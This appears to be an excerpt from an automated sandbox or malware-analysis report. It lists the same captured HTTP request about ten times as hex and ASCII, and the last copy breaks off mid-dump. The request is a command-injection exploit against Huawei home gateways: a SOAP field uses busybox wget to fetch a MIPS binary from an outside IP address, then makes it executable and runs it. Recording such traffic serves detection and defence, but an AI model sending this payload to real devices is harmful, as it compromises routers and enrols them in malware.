      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 